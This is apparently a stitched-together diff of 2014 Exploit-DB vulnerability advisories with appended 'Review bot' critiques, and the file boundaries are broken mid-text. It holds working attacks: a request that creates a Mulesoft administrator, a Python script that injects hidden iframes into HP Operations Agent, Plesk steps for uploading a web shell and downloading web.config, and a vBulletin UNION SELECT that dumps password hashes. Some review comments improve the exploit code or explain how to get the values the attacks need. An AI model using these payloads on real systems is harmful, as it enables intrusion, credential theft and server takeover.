Vulnerable Module(s):
[+] Upload
Vulnerable File(s):
[+] afupload.ma
Vulnerable Parameter(s):
[+] p & filename
Affected Module(s):
[+] Wifi Interface (http://localhost:1861)
Proof of Concept (PoC):
=======================
The code execution web vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: (URL)
http://localhost:1861/afgetdir.ma?p=\var\mobile\Containers\Data\Application\90ACE99A-5EF3-4E3E-B509-32CCDF066AA1\Documents\
PoC: localhost:1861 - Web Interface Index
<tr><td class="tdleft"><a href=""><img class="imgthum" src="afico/files_txt.png"></a></td>
<td class="tdmid">-[CODE EXECUTION VULNERABILITY VIA GET];</td>
<td class="tdright">10-22 13:28<br/><br/>
<a href="afdelete.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C%7C-%7C467299731.txt">delete</a></td>
</tr><tr><td colspan="3" height="1"><hr class="spline" /></td>
</tr><tr></tr></table></body></html>
</iframe></td></tr>
Note:
The input field to create/upload files allows a remote attacker to execute codes directly in the web-server with multiple attack vectors.
--- PoC Session Logs (POST) ---
Status: 302[OK]
POST http://192.168.2.104:1861/afupload.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type]
Request Header:
Host[192.168.2.104:1861]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://192.168.2.104:1861/afgetdir.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------531465230341
Content-Disposition: form-data; name="txt"
-[CODE EXECUTION VULNERABILITY VIA GET];
-----------------------------531465230341
Content-Disposition: form-data; name="file"; filename="[PENG!]"
Content-Type: application/octet-stream
-----------------------------531465230341
Content-Disposition: form-data; name="sub"
upload
-----------------------------531465230341--]
Response Header:
Location[afgetdir.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C]
Content-Length[0]
Server[MHttpServer/1.0.0] Status: 200[OK]
GET http://192.168.2.104:1861/afgetdir.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C
Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[3051] Mime Type[text/html]
Request Header:
Host[192.168.2.104:1861]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://192.168.2.104:1861/afgetdir.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C]
Connection[keep-alive]
Response Header:
Content-Type[text/html]
Content-Length[3051]
Server[MHttpServer/1.0.0]
Reference(s):
afgetdir.ma
afgetdir.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C
afupload.ma
afupload.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C
Solution - Fix & Patch:
=======================
To patch the vulnerability it is required to parse and encode the upload GET method request.
Restrict the input field of the p & filename value to prevent code execution in the main wifi interface.
Security Risk:
==============
The security risk of the code execution web vulnerability in the path value is estimated as critical. (CVSS 9.1)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory - Evolution Security GmbH ™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
COMPANY: Evolution Security GmbH
BUSINESS: www.evolution-sec.com
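Review bot: The PoC demonstrates stored HTML/script injection, not server-side code execution: the `txt` field and the `filename` sent to afupload.ma are written back unescaped into the afgetdir.ma listing (`<td class="tdmid">-[CODE EXECUTION VULNERABILITY VIA GET];</td>`), and nothing shows a payload running outside the victim's browser, so "Critical / CVSS 9.1" and the repeated "code execution" wording are not supported by the logs. The more serious lead is the absolute container path accepted in `p=` on both afupload.ma and afgetdir.ma, which suggests the upload target directory is client-controlled; whether that permits writing outside Documents is not tested here and should be marked as unverified rather than folded into the rating. The "Solution" paragraph should state the actual fix: HTML-encode file names and the `txt` value when rendering the listing, and reject any `p` that does not resolve inside the app's Documents root.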

241
platforms/ios/webapps/35083.txt Executable file

@ -0,0 +1,241 @@
Document Title:
===============
Folder Plus v2.5.1 iOS - Persistent Item Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1348
Release Date:
=============
2014-10-24
Vulnerability Laboratory ID (VL-ID):
====================================
1348
Common Vulnerability Scoring System:
====================================
3.5
Product & Service Introduction:
===============================
The ability to use multi touch to quickly move between viewing and editing files is also very good if youre willing to utilize it. - Touch Reviews.
Folder Plus is an In-App Multitasking Capable File Manager/Viewer/Editor, with 3-Finger Swipes You Switch between Tasks of File Managing, Viewing,
Editing, etc QUICKLY.
(Copy of the Vendor Homepage: http://theverygames.com/folder-plus/ & https://itunes.apple.com/us/app/file-manager-folder-plus/id484856077 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent input validation web vulnerability in the official The Very Games `Folder Plus` iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2014-10-24: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
The Very Games
Product: Folder Plus - iOS Mobile Web Application (Wifi) 2.5.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Folder Plus v2.5.1 iOS mobile application.
The issue allows an attacker to inject own script code as payload to the application-side of the vulnerable service function or module.
The vulnerability is located in the delete item message context of the wifi interface listing module. The issue allows remote attackers
to inject own persistent script codes by usage of the vulnerable create folder function. The attacker injects a script code payloads and
waits for a higher privileged delete of the item to execute the script codes. The execution of the injected script code occurs in the
delete message context to confirm to erase. The attack vector is persistent on the application-side and the request method to execute
is GET. The issue allows to stream persistent malicious script codes to the front site wifi root path.
The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 2.5.
Exploitation of the application-side web vulnerability requires a low privileged web-application user account and low or medium user interaction.
Successful exploitation of the vulnerabilities result in persistent phishing, session hijacking, persistent external redirect to malicious
sources and application-side manipulation of affected or connected module context.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] Wifi Sharing
Vulnerable Function(s):
[+] Delete Item
Vulnerable Parameter(s):
[+] items name
Affected Module(s):
[+] Wifi Interface - Root Index
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers without privileged application user account and with
low or medium user interaction. For security demonstration or to reproduce the issue follow the provided information and steps below to continue.
PoC: Folder Plus > THE VERY GAMES - Wifi UI Index
<tbody><tr style="height:32px"><td style="width:32px"></td><td>?????</td><td style="width:32px"></td></tr>
<tr style="height:66px" valign="top">
<td></td>
<td id="modal_body1" style="width:336px" align="left">Delete<div style="display: inline-block;"
class="horz_padding"></div><img src="/?action=extra&path=icons/iconFolder.png" style="width: 16px; height:
16px; vertical-align: text-top;"><div style="width: 4px;
display: inline-block;"></div> "><[PERSISTENT INJECTED SCRIPT CODE!]);"><div style="display: inline-block;" class="horz_padding"></div>?</td>?????
<td></td>
</tr>
<tr style="height:32px" valign="middle">
<td></td>
<td id="modal_body2" align="right"><a href="#"
class="toolbar_button"><div style="display: inline-block;">Cancel</div></a><div style="width: 16px; display: inline-block;"></div>
<a href="#" class="toolbar_button"><img style="vertical-align: text-top; display: inline;" src="/?action=extra&path=images/delete1.png">
<img style="vertical-align: text-top; display: none;" src="/?action=extra&path=images/delete2.png"><div style="width: 4px; display:
inline-block;"></div><div style="display: inline-block;">Delete</div></a></td>
<td></td>
</tr>
<tr style="height:20px">
<td></td>
<td></td>
<td align="center" valign="middle">
<div id="modal_body3"></div>
</td>
</tr>
</tbody>
--- PoC Session Logs [POST] ---
Status: 200[OK]
GET http://localhost/?action=directory&path=%3Ciframe%20src%3Dhttp://www.vulnerability-lab.com%3E Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[2] Mime Type[application/json]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[2]
Vary[Accept]
Content-Type[application/json]
Date[Tue, 21 Oct 2014 15:42:33 GMT]
Status: 200[OK]
GET http://localhost/?action=list Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[491] Mime Type[application/json]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[491]
Vary[Accept]
Content-Type[application/json]
Date[Tue, 21 Oct 2014 15:42:34 GMT]
Status: 200[OK]
GET http://localhost/[PERSISTENT INJECTED SCRIPT CODE!] Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[0]
Date[Tue, 21 Oct 2014 15:42:36 GMT]
Reference(s):
http://localhost/?action=
http://localhost/?action=directory&path=
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure restriction implementation and filter mechanism on new folder inputs.
After the restriction the input needs to be encoded or parsed to prevent the persistent script code execution in the delete function.
Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the delete item function is estimated as medium.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
COMPANY: Evolution Security GmbH
BUSINESS: www.evolution-sec.com
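Review bot: The advisory contradicts itself on severity and preconditions: the header scores the issue at CVSS 3.5 while the technical description says "a cvss ... count of 2.5", and the description says exploitation "requires a low privileged web-application user account" while the PoC section says it works "without privileged application user account". The session log shows the injection point is the folder name passed to `/?action=directory&path=<iframe src=...>`, which is then rendered unescaped inside the delete-confirmation modal; the "Vulnerable Parameter(s)" entry should name `path` on the directory action rather than "items name", and the fix should say to HTML-encode the item name when building the modal text. The wifi interface appears to accept the create request with no authentication in the log, which is the detail that makes the persistent vector reachable from any LAN client and is worth stating explicitly.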

53
platforms/jsp/webapps/35079.txt Executable file

@ -0,0 +1,53 @@
Mulesoft ESB Runtime 3.5.1 Authenticated Privilege Escalation ? Remote Code
Execution
Mulesoft ESB Runtime 3.5.1 allows any arbitrary authenticated user to
create an administrator user due to a lack of permissions check in the
handler/securityService.rpc endpoint. The following HTTP request can be
made by any authenticated user, even those with a single role of Monitor.
POST /mmc-3.5.1/handler/securityService.rpc HTTP/1.1
Host: 192.168.0.22:8585
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0)
Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/x-gwt-rpc; charset=utf-8/
Referer: http://192.168.0.22:8585/mmc-3.5.1/index.jsp
Content-Length: 503
Cookie: JSESSIONID=CEB49ED5E239CB7AB6B7C02DD83170A4;
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
7|0|15|http://192.168.0.22:8585/mmc-3.5.1/com.mulesoft.mmc.MMC/
|5192695B02944BAAB195B91AB3FDDA48|org.mule.galaxy.web.rpc.RemoteSecurityService|addUser|org.mule.galaxy.web.rpc.WUser/4112688705|java.lang.String/2004016611|
fdsafdsa@fdsafdsa.com
|java.util.ArrayList/4159755760|298e8098-ff3e-4d13-b37e-3f3d33193ed9|ed4cbe90-085d-4d44-976c-436eb1d78d16|ccd8aee7-30bb-42e1-8218-cfd9261c7af9|d63c1710-e811-4c3c-aeb6-e474742ac084|fdsa|notadmin|notpassword|1|2|3|4|2|5|6|5|7|8|4|6|9|6|10|6|11|6|12|0|13|0|0|14|15|
This request will create an administrator with all roles with a username
of notadmin and a password of notpassword. Many vectors of remote code
execution are available to an administrator. Not only can an administrator
deploy WAR applications, they can also evaluate arbitrary groovy scripts
via the web interface.
--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
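Review bot: The GWT-RPC body is tied to the tester's instance, which the text does not say: the strong-name hash `5192695B02944BAAB195B91AB3FDDA48` after the module URL is build-specific, and the four UUIDs preceding `fdsa|notadmin|notpassword` are role IDs that will differ on another install, so a reader needs to harvest both from the target (the hash from the compiled MMC client, the role IDs from the roles listing) before replaying. The header `Content-Type: text/x-gwt-rpc; charset=utf-8/` carries a stray trailing slash that should be dropped. No fixed version or vendor reference is given; a "Fix" line stating that the `securityService.rpc` addUser handler must enforce the administrator role server-side would complete the advisory.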

61
platforms/linux/dos/35081.txt Executable file

@ -0,0 +1,61 @@
Many shell users, and certainly a lot of the people working in
computer forensics or other fields of information security, have a
habit of running /usr/bin/strings on binary files originating from the
Internet. Their understanding is that the tool simply scans the file
for runs of printable characters and dumps them to stdout - something
that is very unlikely to put you at any risk.
It is much less known that the Linux version of strings is an integral
part of GNU binutils, a suite of tools that specializes in the
manipulation of several dozen executable formats using a bundled
library called libbfd. Other well-known utilities in that suite
include objdump and readelf.
Perhaps simply by the virtue of being a part of that bundle, the
strings utility tries to leverage the common libbfd infrastructure to
detect supported executable formats and "optimize" the process by
extracting text only from specific sections of the file.
Unfortunately, the underlying library can be hardly described as safe:
a quick pass with afl [1] (and probably with any other competent
fuzzer) quickly reveals a range of troubling and likely exploitable
out-of-bounds crashes due to very limited range checking. In binutils
2.24, you can try:
$ wget http://lcamtuf.coredump.cx/strings-bfd-badptr2
EDB Mirror: http://www.exploit-db.com/sploits/35081
...
$ strings strings-bfd-badptr2
Segmentation fault
...
strings[24479]: segfault at 4141416d ip 0807a4e7 sp bf80ca60 error 4
in strings[8048000+9a000]
...
while (--n_elt != 0)
if ((++idx)->shdr->bfd_section)
elf_sec_group (idx->shdr->bfd_section) = shdr->bfd_section;
...
(gdb) p idx->shdr
$1 = (Elf_Internal_Shdr *) 0x41414141
In other words, this code appears to first read and then write to an
arbitrary pointer (0x41414141) taken from the input file. Many Linux
distributions ship strings without ASLR, making potential attacks
easier and more reliable - a situation reminiscent of one of
CVE-2014-6277 in bash [2].
Interestingly, the problems with the utility aren't exactly new; Tavis
spotted the first signs of trouble in other parts of libbfd some nine
years ago [3].
In any case: the bottom line is that if you are used to running
strings on random files, or depend on any libbfd-based tools for
forensic purposes, you should probably change your habits. For strings
specifically, invoking it with the -a parameter seems to inhibit the
use of libbfd. Distro vendors may want to consider making the -a mode
default, too.
[1] Obligatory plug: http://code.google.com/p/american-fuzzy-lop/
[2] http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html
[3] https://bugs.gentoo.org/show_bug.cgi?id=91398
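Review bot: The mitigation advice covers only `strings -a`, but the text itself notes that objdump and readelf go through the same libbfd, so the closing recommendation should say that any libbfd-based tool, not just strings, must be treated as an attack surface when run on untrusted input and kept inside a sandbox or throwaway VM for forensic work. The gdb excerpt supports the "read then write through an attacker-controlled pointer" claim (`p idx->shdr` yields `0x41414141` and the loop assigns through `idx->shdr->bfd_section`), but the note that many distributions ship strings without ASLR is an observation about packaging and would be clearer as "binutils is often built without PIE". No patched binutils version is named; readers should check their distribution's binutils advisory rather than assume 2.24 is the only affected release.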


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/45245/info
RDM Embedded is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. The issue affects the 'lm_tcp' service.
Successful exploits may allow an attacker to execute arbitrary code in the context of a user running an application that uses the affected library. Failed exploit attempts may crash the application, denying service to legitimate users.
The issue affects lm_tcp <= 9.0.0 0248.18.0.0; other versions may also be affected.
http://www.exploit-db.com/sploits/35062.zip


@ -0,0 +1,89 @@
#!/usr/bin/python
# Exploit Title: HP Operations Agent / HP Communications Broker Remote XSS iFrame Injection
# Date: 10/16/2014
# Exploit Author: Matt Schmidt (Syph0n)
# Vendor Homepage: www.hp.com
# Version: HP Operations Manager/Operations Agent / OpenView Communications Broker < 11.14
# Tested on: Windows 7, SunOS, RHEL Linux
# CVE : CVE-2014-2647
#
# This script was written to exploit a remote cross-site scripting vulnerability in HP Communication Broker/ HP Operations Agent.
# This vulnerability is stored in nature until the connection is terminated as it adds the XSS string to the User Agent.
# Vulnerable page: /Hewlett-Packard/OpenView/BBC/status
# This Exploit injects a Hidden iFrame which can be used for Social Engineering attacks as a browser exploit or other malicious URL can be embedded.
#
# Vulnerability Discovered by: Matt Schmidt (Syph0n)
# Timeline:
# 07/07/2014 - Submitted Discovery to ZDI
# 07/08/2014 - ZDI decided not to accept this vulnerability and directed to HP SSRT.
# 07/12/2014 - Contacted HP SSRT
# 07/13/2014 - HP SSRT assigned Case SSRT101643
# 07/17/2014 - Submitted Discovery and PoC exploit code to HP SSRT
# 07/30/2014 - Followed up with HP
# 07/31/2014 - Response from HP Indicating they need more time for Engineering to look into the submission
# 08/13/2014 - Followed up with HP
# 08/13/2014 - Response from HP stating that this issue will be resolved in version OA 11.14
# 08/24/2014 - Followed up with HP on CVE Identified and Disclosure Date
# 08/31/2014 - Followed up with HP again as no response to previous email
# 09/04/2014 - Followed up with HP again as no response to previous two emails
# 09/14/2014 - Followed up with HP again as no response to previous three emails
# 09/16/2014 - HP Responded stating they where "sorting out various items concerning this issue"
# 10/01/2014 - Followed up with HP asking for Disclosure Date and CVE Identifier
# 10/06/2014 - HP Responded indicating a disclosure was due out the week of the 6th.
# 10/15/2014 - HP Issued the following Security Bulletin regarding this vulnerability - https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04472444
# 10/15/2014 - CVE-2014-2647 Issued for this vulnerability
import argparse, socket, sys
# Define Help Menu
if (len(sys.argv) < 2) or (sys.argv[1] == '-h') or (sys.argv[1] == '--help'):
print '\nUsage: ./exploit.py <TargetIP> <iFrame URL> [Port]\n'
print ' <TargetIP>: The Target IP Address'
print ' <iFrame URL>: Malicious URL that will be injected as a hidden iframe\n'
print 'Options:'
print ' [--port]: The port the HP Communications Broker is running on, default is 383'
sys.exit(1)
# Parse Arguments
parser = argparse.ArgumentParser()
parser.add_argument("TargetIP")
parser.add_argument("iFrameURL")
parser.add_argument("--port", type=int, default=383)
args = parser.parse_args()
# Define User Agent to be spoofed
agent = 'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)'
# Define Variables
host = args.TargetIP
port = args.port
iFrameURL = args.iFrameURL
def main():
# Malicious hidden iframe payload that takes input from args.iFrameURL and fake UserAgent from agent_list
payload = "GET /Hewlett-Packard/OpenView/BBC/status HTTP/1.1\r\nUser-Agent: <iframe height='0' width='0' style='visibility:hidden;display:none' src='"+iFrameURL+"'></iframe><a>"+ agent +"</a>\r\n\r\n"
# Create Socket and check connection to target.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*] Checking host: " +host+"\n"
try:
s.connect((host, int(port)))
except Exception as e:
print "[+] Error Connecting: ", e
exit()
print "[*] Sending payload to HP OpenView HTTP Communication host " +host+"\n"
# Keep connection alive
while payload != 'q':
s.send(payload.encode())
data = s.recv(1024)
print "[*] Payload Sent."
payload = raw_input("\n[+] Keeping Connection Open ([q]uit):")
return
if __name__ == '__main__':
main()
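Review bot: The keep-alive loop in `main()` re-sends whatever the user types, not the exploit: after the first iteration `payload` is reassigned from `raw_input`, so on the next pass `s.send(payload.encode())` transmits the typed text as a malformed request, and the only clean exit is the literal `q`. The socket is also never closed, `s.recv(1024)` can block indefinitely if the broker does not answer, and the usage banner advertises a positional `[Port]` while argparse only accepts `--port`. Keep the crafted request in its own variable, loop until the user quits, and close the socket on exit.
```python
    print "[*] Sending payload to HP OpenView HTTP Communication host " +host+"\n"
    request = payload
    s.settimeout(10)
    try:
        while True:
            s.send(request.encode())
            try:
                s.recv(1024)
            except socket.timeout:
                pass
            print "[*] Payload Sent."
            if raw_input("\n[+] Keeping Connection Open ([q]uit):").strip() == 'q':
                break
    finally:
        s.close()
```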

75
platforms/php/webapps/34593.txt Executable file

@ -0,0 +1,75 @@
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Title : Multiple Vulnerabilities in Parallels® Plesk Sitebuilder
# Author : alieye
# vendor : http://www.parallels.com/
# Contact : cseye_ut@yahoo.com
# Risk : High
# Class: Remote
#
# Google Dork:
# inurl::2006/Sites ext:aspx
# inurl::2006 inurl:.ashx?mediaid
# intext:"© Copyright 2004-2007 SWsoft." ext:aspx
# inurl:Wizard/HostingPreview.aspx?SiteID
#
# Date: 23/07/2014
# os : windows server 2003
# poc video clip : http://alieye.persiangig.com/video/plesk.rar/download
#
# version : for uploading shell (Parallels® Plesk panel 9.5 - Parallels® Plesk Sitebuilder 4.5) Copyright 2004-2010
# version : for other bug (Parallels® Plesk panel 9.5 - Parallels® Plesk Sitebuilder 4.5) Copyright 2004-2014
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
1-bypass loginpage (all version)
http://victim.com:2006/login.aspx
change url path to http://victim.com:2006/wizard
---------------------------------------------------------
2-uploading shell via Live HTTP Headers(Copyright 2004-2010)
Tools Needed: Live HTTP Headers, Backdoor Shell
Step 1: Locate upload form on logo upload section in http://victim.com:2006/Wizard/DesignLayout.aspx
Step 2: Rename your shell to shell.asp.gif and start capturing data with
Live HTTP Headers
Step 3: Replay data with Live HTTP Headers -
Step 4: Change [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.gif"\r\n] to [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.asp"\r\n]
Step 5: go to shell path:
http://victim.com:2006/Sites/GUID Sitename created/App_Themes/green/images/shell_asp.asp
---------------------------------------------------------
3-Arbitrary File Download Vulnerability(all version)
You can download any file from your target
http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=GUID Sitename created&p=filename
example:
http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=4227d5ca-7614-40b6-8dc6-02460354790b&p=web.config
---------------------------------------------------------
4-xss(all version)
you can inject xss code in all module of this page http://victim.com:2006/Wizard/Edit.aspx
goto this page (edit.aspx), click on one module (Blog-eShop-Forum-...) then goto "Add New Category" and insert xss code in Category description and .... Enjoy :)
---------------------------------------------------------
5-not authentication for making a website(all version)
making malicious page and phishing page with these paths
http://victim.com:2006/Wizard/Pages.aspx
http://victim.com:2006/Wizard/Edit.aspx
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] special members: ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir
[#] Thanks To All cseye members and All Iranian Hackers
[#] website : http://cseye.vcp.ir/
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Spt Tnx To Master of Persian Music: Hossein Alizadeh
[#] Hossein Alizadeh website : http://www.hosseinalizadeh.net/
[#] download ney-nava album : http://dnl1.tebyan.net/1388/02/2009052010245138.rar
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
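Review bot: The upload step shows the server only checks the client-supplied file extension and then rewrites the name (the request sends `filename="shell.asp.asp"` and the file lands as `shell_asp.asp`), which is the detail a defender needs: the check runs on the original name before the dot-to-underscore rewrite, so the fix is to validate the final stored name against an allow-list of image extensions and to serve the logo directory without script execution. Items 2, 3 and 5 all depend on the site GUID in the path, and item 1 explains where it comes from: the `/wizard` path is reachable without login, so an attacker creates a site to obtain a GUID and then reuses it for the upload and the `Site.ashx?s=GUID&p=web.config` download. The `p=` parameter in item 3 is shown returning `web.config`, which typically contains connection strings; whether it also accepts traversal outside the site folder is not tested and should be flagged as unverified rather than implied by "download any file".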

31
platforms/php/webapps/34717.txt Executable file

@ -0,0 +1,31 @@
#Title: vBulletin Verify Email Before Registration Plugin - SQL Injection
#Date: September 19 2014
#Version: Any vBulletin 4.*.* version which has the plugin installed.
#Plugin: http://www.vbulletin.org/forum/showthread.php?t=294164
#Author: Dave (FW/FG)
The vulnerability resides in the register_form_complete hook, and some
other hooks.
The POST/GET data is not sanitized before being used in queries.
SQL injection at:
http://example.com/register.php?so=1&emailcode=[sqli]
PoC:
http://example.com/register.php?so=1&emailcode=1' UNION SELECT null,
concat(username,0x3a,password,0x3a,salt), null, null, null, null FROM
user WHERE userid = '1
Now look at the source of the page and find:
<input type="text" style="display: none" name="email" id="email"
maxlength="50" value="[DATA IS HERE]" dir="ltr" tabindex="1">
<input type="text" style="display: none" name="emailconfirm" id="email"
